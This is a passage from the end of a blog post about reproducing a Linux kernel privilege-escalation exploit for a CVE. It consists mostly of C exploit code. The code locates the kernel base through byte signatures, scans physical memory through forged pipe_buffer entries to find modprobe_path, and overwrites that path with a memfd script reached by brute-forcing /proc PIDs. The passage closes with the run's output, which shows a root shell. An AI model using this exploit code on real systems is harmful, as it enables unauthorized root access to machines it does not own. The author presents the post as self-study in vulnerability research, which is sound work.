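static uint64_t phys_for_page(uint64_t vmemmap_base, uint64_t page)
{
    return ((page - vmemmap_base) / STRUCT_PAGE_SZ) << PAGE_SHIFT;
}
```

With the values printed in the final run at the end of this post, the eighth aligned candidate (`8 * PHYSICAL_ALIGN`, physical address 0x1000000) maps to 0xffffea0000040000, which is the page where the kernel base was found. Going the other way, the modprobe page 0xffffea00000d9dc0 corresponds to physical address 0x3677000.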

Notice that inside the pipe read loop we call the is_kernel_base() function. This function is based on an exploit from lau and matches byte patterns that may be present in the kernel base page across various builds, to maximize compatibility.

  
...
static bool is_kernel_base(unsigned char *addr)
{
    // thanks lau :)

    // get-sig kernel_runtime_1
    if (memcmp(addr + 0x0, "\x48\x8d\x25\x51\x3f", 5) == 0 &&
        memcmp(addr + 0x7, "\x48\x8d\x3d\xf2\xff\xff\xff", 7) == 0)
        return true;

    // get-sig kernel_runtime_2
    if (memcmp(addr + 0x0, "\xfc\x0f\x01\x15", 4) == 0 &&
        memcmp(addr + 0x8, "\xb8\x10\x00\x00\x00\x8e\xd8\x8e\xc0\x8e\xd0\xbf", 12) == 0 &&
        memcmp(addr + 0x18, "\x89\xde\x8b\x0d", 4) == 0 &&
        memcmp(addr + 0x20, "\xc1\xe9\x02\xf3\xa5\xbc", 6) == 0 &&
        memcmp(addr + 0x2a, "\x0f\x20\xe0\x83\xc8\x20\x0f\x22\xe0\xb9\x80\x00\x00\xc0\x0f\x32\x0f\xba\xe8\x08\x0f\x30\xb8\x00", 24) == 0 &&
        memcmp(addr + 0x45, "\x0f\x22\xd8\xb8\x01\x00\x00\x80\x0f\x22\xc0\xea\x57\x00\x00", 15) == 0 &&
        memcmp(addr + 0x55, "\x08\x00\xb9\x01\x01\x00\xc0\xb8", 8) == 0 &&
        memcmp(addr + 0x61, "\x31\xd2\x0f\x30\xe8", 5) == 0 &&
        memcmp(addr + 0x6a, "\x48\xc7\xc6", 3) == 0 &&
        memcmp(addr + 0x71, "\x48\xc7\xc0\x80\x00\x00", 6) == 0 &&
        memcmp(addr + 0x78, "\xff\xe0", 2) == 0)
        return true;

    return false;
}
...

Next, we locate the physical page that contains modprobe_path:

  
...
// Scan kernel memory
    uint64_t modprobe_page, modprobe_off;
    uint32_t pipe_idx;
    uint64_t base_off = 0;
    puts("[*] scanning kernel memory");
    for (uint64_t i = 0;; i++)
    {
        pipebuf->page = vmemmap_base + kernel_base + 0x40 * i;
        pipebuf->offset = 0;
        pipebuf->len = PAGE_SIZE + 1;

        if (!(i % 1000))
        {
            printf("\r[*] trying 0x%lx, %luMb", pipebuf->page, i * 4096 / 1024 / 1024);
        }
        for (int i = 0; i < SKBUF_SPRAY; i++)
        {
            if (write(sock[i][0], pipebuf, 1024 - 320) < 0)
            {
                perror("\n[-] write(socket)");
                return -1;
            }
        }

        for (int j = 0; j < PIPE_SPRAY; j++)
        {
            memset(&data, 0, PAGE_SIZE);
            int count;
            if ((count = read(pfd[j][0], &data, PAGE_SIZE)) < 0)
            {
                continue;
            }

            if (!memcmp(&data, "pwn", 3))
            {
                continue;
            }

            void *locate = (uint64_t *)memmem(&data, PAGE_SIZE, "/sbin/modprobe", sizeof("/sbin/modprobe"));
            if (locate)
            {
                puts("\n[+] found modprobe_path");
                modprobe_page = pipebuf->page;
                modprobe_off = (uint8_t *)locate - data;
                printf("[*] modprobe page: 0x%lx\n", modprobe_page);
                printf("[*] modprobe offset: 0x%lx\n", modprobe_off);
                found = true;
                pipe_idx = j;
                break;
            }
        }
...        

Overwriting modprobe_path

Once we have found the string /sbin/modprobe in kernel memory, replacing it with a controlled value that points to a file we own is relatively easy.

A very well-known trick to make this work, even when we run inside a chroot and cannot create files in the root file system, is to use a memfd exposed via /proc/<pid>/fd/<n>. It’s worth noting that, since we are inside an unprivileged namespace, our PID as seen from outside is unknown, so we brute-force it.

  
...
    puts("[*] overwrite modprobe_path");
    for (int i = 0; i < 4194304; i++)
    {
        pipebuf->page = modprobe_page;
        pipebuf->offset = modprobe_off;
        pipebuf->len = 0;
        for (int i = 0; i < SKBUF_SPRAY; i++)
        {
            if (write(sock[i][0], pipebuf, 1024 - 320) < 0)
            {
                perror("[-] write(socket)");
                break;
            }
        }

        memset(&data, 0, PAGE_SIZE);
        snprintf(fd_path, sizeof(fd_path), "/proc/%i/fd/%i", i, modprobe_fd);

        lseek(modprobe_fd, 0, SEEK_SET);
        dprintf(modprobe_fd, MODPROBE_SCRIPT, i, status_fd, i, stdin_fd, i, stdout_fd);

        if (write(pfd[pipe_idx][1], fd_path, 32) < 0)
        {
            perror("\n[-] write(pipe)");
        }

        if (check_modprobe(fd_path))
        {
            puts("[-] failed to overwrite modprobe");
            break;
        }

        if (trigger_modprobe(status_fd))
        {
            puts("\n[+] got root");
            goto out;
        }

        for (int i = 0; i < SKBUF_SPRAY; i++)
        {
            if (read(sock[i][1], leak, 1024 - 320) < 0)
            {
                perror("[-] read(socket)");
                return -1;
            }
        }
    }
    puts("[-] fake modprobe failed");
...
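
The memfd part of the loop above can be sketched on its own. This is a minimal illustration, not the exploit's actual helper code: `make_script_memfd` and `fd_path` are hypothetical names, and the script contents are up to the caller. It assumes glibc's memfd_create wrapper is available.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Create an anonymous in-memory file holding `script`; returns fd or -1. */
static int make_script_memfd(const char *script)
{
    int fd = memfd_create("payload", 0);
    if (fd < 0)
        return -1;
    size_t len = strlen(script);
    if (write(fd, script, len) != (ssize_t)len) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Format the path under which process `pid` exposes descriptor `fd`. */
static int fd_path(char *out, size_t outsz, int pid, int fd)
{
    int n = snprintf(out, outsz, "/proc/%d/fd/%d", pid, fd);
    return (n < 0 || (size_t)n >= outsz) ? -1 : 0;
}
```

Because the file lives only in memory and is reached through procfs, nothing has to be written to the root file system. The only unknown is the PID component of the path, which is why the loop tries every candidate value.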

The final result:

  
[ Bam0x7 ]
/ $ ./exploit
[*] prepare table and chain
[*] trigger double-free
[+] table spray-0->udata 0x3232323232323232
[+] table spray-2->udata 0x3232323232323232
[+] got duplicated table
[*] replace with msg_msg
[*] kmalloc-1k msg: 0xffff88810307a400
[*] victim qid: 488
[*] send fake msg skbuf
[*] double-free victim msg
[*] read pipe_buffer with skbuf
[+] found pipe_buffer
[*] vmemmap_base: 0xffffea0000000000
[*] bruteforce phys-KASLR
[*] trying 0xffffea0000040000
[+] kernel base vmemmap offset: 0x40000
[*] scanning kernel memory
[*] trying 0xffffea00000cca00, 35Mb
[+] found modprobe_path
[*] modprobe page: 0xffffea00000d9dc0
[*] modprobe offset: 0x4a0
[*] overwrite modprobe_path
/bin/sh: can't access tty; job control turned off
/ # id
uid=0(root) gid=0(root)
/ # whoami
root
/ # 

The complete exploit and test environment are on my GitHub.

Conclusion

I’m pretty happy and satisfied with my first success, even though I didn’t write the full exploit myself and I wasn’t the one who discovered the bug. Reproducing it was the only way I had to challenge myself after a year of learning about Linux kernel vulnerability research and exploitation. Even though I am self-taught and my background has absolutely nothing to do with this field, I am glad to have reproduced the exploit for this CVE and gotten my first root. If you are a veteran in this field and happen to read this, please send criticism and suggestions about my first CVE post to my Gmail. And thank you very much to the researchers who have published their discoveries and write-ups, from which I have learned a lot this past year.